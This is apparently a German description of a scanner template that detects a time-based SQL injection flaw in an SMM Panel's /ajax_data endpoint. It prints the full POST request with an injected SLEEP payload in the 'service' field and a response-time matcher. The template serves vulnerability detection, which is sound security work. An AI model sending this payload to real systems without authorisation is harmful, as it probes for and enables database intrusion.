
Zeitbasierte SQL-Injection-Erkennungsvorlage für SMM Panel. Sendet maßgeschneiderte POST-Anfragen an `/ajax_data` und erkennt verwundbare Endpunkte durch Analyse der Antwortverzögerung.
Zeitbasierte SQL-Injection-Erkennung für SMM Panel
Diese Vorlage erkennt eine zeitbasierte SQL-Injection-Schwachstelle im Parameter service_detail des SMM Panels über HTTP-POST-Anfragen an /ajax_data. Ausnutzung kann es entfernten Angreifern ermöglichen, auf sensible Daten zuzugreifen oder Berechtigungen zu erweitern.
Das Tool sendet eine präparierte POST-Anfrage:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Wenn die Antwortzeit größer als 5 Sekunden ist, deutet dies auf einen anfälligen Endpunkt hin.
- Methode: POST
- Pfad: {{BaseURL}}/ajax_data
- Header: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: Dauer > 5 Sekunden
